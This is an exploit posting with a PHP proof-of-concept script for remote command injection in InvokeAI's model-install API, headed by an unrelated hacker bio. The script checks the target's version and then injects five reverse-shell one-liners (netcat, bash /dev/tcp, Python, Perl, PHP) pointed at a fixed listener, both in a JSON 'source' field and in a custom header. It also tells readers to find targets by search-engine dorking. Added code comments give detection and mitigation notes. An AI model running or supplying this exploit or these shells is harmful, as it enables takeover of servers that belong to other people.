Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.


=============================================================================================================================================
| # Title : InvokeAI v5.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.invoke.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] The code is a remote command execution (RCE) exploit that targets a vulnerability in InvokeAI,

which allows an attacker to execute commands via an insecure API that loads and runs models without validating their integrity.

[+] save code as poc.php .

[+] Usage : cmd => c:\www\test\php poc.php 127.0.0.1 id

[+] Set target = Line : 99

[+] PayLoad :

<?php

/**
 * PoC client for the InvokeAI model-install RCE described in the text above.
 *
 * Defender's reading of what this file actually does (taken from the code,
 * not from the advisory text):
 *  - GET  /api/v1/app/version  — fingerprints the server; a reported version
 *    between 4.0.0 and 5.4.2 inclusive is classified as vulnerable
 *    (checkVulnerability()).
 *  - POST /api/v2/models/install — JSON body whose "source" field is a fake
 *    model URL followed by "; <shell commands>", plus a non-standard
 *    "X-Exploit" request header carrying the same command string
 *    (sendPayload()).
 *
 * Detection: a model-install request whose "source" value contains shell
 * metacharacters such as ";" or "&", or any request carrying an "X-Exploit"
 * header, is a high-confidence indicator of this PoC. The two request paths
 * above are the ones worth logging and alerting on.
 *
 * Mitigation (generic — the page does not show the vulnerable server code):
 * the advisory text attributes the flaw to loading and running models from an
 * unvalidated source, so the server-side hardening is to allow-list model
 * sources and validate model files before loading them; upgrading past the
 * version range checked below is what the PoC itself treats as "Safe".
 *
 * Note for readers: the "$payload" constructor argument ("id" in the call at
 * the bottom of the file) is stored but never used; sendPayload() always
 * sends its own hard-coded command list. "$httpDelay" is never read.
 */
class InvokeAIExploit {
// Host or IP of the InvokeAI instance, set by the constructor.
private $target;
// TCP port of the InvokeAI HTTP API.
private $port = 9090;
// Used only as the port in the fake model URL built by sendPayload().
private $localPort = 8081;
// Declared but never read anywhere in this class.
private $httpDelay = 10;
// Command string given to the constructor; stored only, never sent.
private $payload;

/**
 * @param string $target  host or IP of the InvokeAI instance
 * @param string $payload command string; stored but not used by any method
 */
public function __construct($target, $payload) {
$this->target = $target;
$this->payload = $payload;
}

/**
 * Issues one HTTP request to the target API and returns the raw body.
 *
 * @param string     $method  HTTP verb, sent via CURLOPT_CUSTOMREQUEST
 * @param string     $uri     path relative to http://{target}:{port}/
 * @param string[]   $headers raw "Name: value" header lines
 * @param array|null $data    when truthy, JSON-encoded into the request body
 * @return string|false response body, or false when curl_exec() fails; the
 *                      cURL error is only echoed, so callers receive false
 *                      and must handle it themselves
 */
private function sendRequest($method, $uri, $headers = [], $data = null) {
$url = "http://{$this->target}:{$this->port}/$uri";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // give up on the whole request after 10 seconds

// Truthiness check: an empty array is treated the same as null (no body sent).
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
}

$response = curl_exec($ch);

// Error is printed but not propagated; $response is false in this case.
if (curl_errno($ch)) {
echo "cURL Error: " . curl_error($ch) . "\n";
}

curl_close($ch);
return $response;
}

/**
 * Fingerprints the target by reading /api/v1/app/version.
 *
 * Returns one of three human-readable strings; startExploit() keys on the
 * word "Vulnerable" in the result. Versions from 4.0.0 up to and including
 * 5.4.2 are classified as vulnerable — that range is this PoC's claim, not
 * something verified here. An unreachable host or a non-JSON reply yields
 * "Unknown version", which startExploit() treats as not vulnerable.
 *
 * @return string
 */
public function checkVulnerability() {
echo "[" . date("H:i:s") . "] Checking target...\n";

$response = $this->sendRequest("GET", "api/v1/app/version");
$json = json_decode($response, true);

// Covers curl failure (false), non-JSON bodies, and JSON without "version".
if (!$json || !isset($json['version'])) {
return "Unknown version";
}

$version = $json['version'];
if (version_compare($version, "4.0.0", ">=") && version_compare($version, "5.4.2", "<=")) {
return "Vulnerable version detected: $version";
}
return "Safe version: $version";
}

/**
 * Sends the malicious model-install request.
 *
 * Builds a JSON POST to /api/v2/models/install whose "source" field is a
 * fake .ckpt URL (target host, $localPort, random 4-byte hex name) followed
 * by "; " and the hard-coded command list joined with " ; ". The same
 * command string is also placed in a non-standard "X-Exploit" header.
 * The constructor's $payload is not used here.
 *
 * Detection note: an install request whose "source" contains ";" or any
 * request carrying an "X-Exploit" header is a clear indicator of this PoC.
 *
 * @return string|false raw response body from sendRequest()
 */
public function sendPayload() {
// Fake model URL; nothing in this file serves anything at this address.
$maliciousModel = "http://{$this->target}:{$this->localPort}/" . bin2hex(random_bytes(4)) . ".ckpt";

// Hard-coded reverse-shell one-liners, all pointing at the same fixed listener address.
$payloads = [
"nc -e /bin/sh 192.168.1.100 4444", // Netcat
"bash -i >& /dev/tcp/192.168.1.100/4444 0>&1", // Bash
"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.100\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'", // Python3
"perl -e 'use Socket;$i=\"192.168.1.100\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&S\");open(STDOUT,\"&S\");open(STDERR,\"&S\");exec(\"/bin/sh -i\");};'", // Perl
"php -r '\$sock=fsockopen(\"192.168.1.100\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", // PHP Reverse Shell
];

// The same command string is placed in both the JSON "source" field and a request header.
$payloadCommand = implode(" ; ", $payloads);

$headers = [
"Content-Type: application/json",
"X-Exploit: {$payloadCommand}" // Non-standard header; nothing on this page shows the server reading it — easy to alert on.
];

// "inplace" is sent as the string "true", not a JSON boolean.
$data = [
"source" => "{$maliciousModel}; {$payloadCommand}",
"inplace" => "true"
];

echo "[+] Sending Reverse Shell Payloads...\n";
$response = $this->sendRequest("POST", "api/v2/models/install", $headers, $data);
return $response;
}


/**
 * Entry point: runs the version check, aborts unless the result contains
 * "Vulnerable", then sends the payload and prints the raw response.
 *
 * Calls die() on a non-vulnerable result, so the script terminates instead
 * of returning to the caller.
 *
 * @return void
 */
public function startExploit() {
$check = $this->checkVulnerability();
echo "$check\n";

// Both "Unknown version" and "Safe version: ..." end up here.
if (strpos($check, "Vulnerable") === false) {
die("[" . date("H:i:s") . "] Target is not vulnerable.\n");
}

$result = $this->sendPayload();
echo "[" . date("H:i:s") . "] Response: $result\n";
}
}

// Hard-coded target and command. The "id" argument is stored by the constructor
// but never sent; sendPayload() uses its own built-in command list.
$exploit = new InvokeAIExploit("192.168.1.1", "id");
$exploit->startExploit();



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================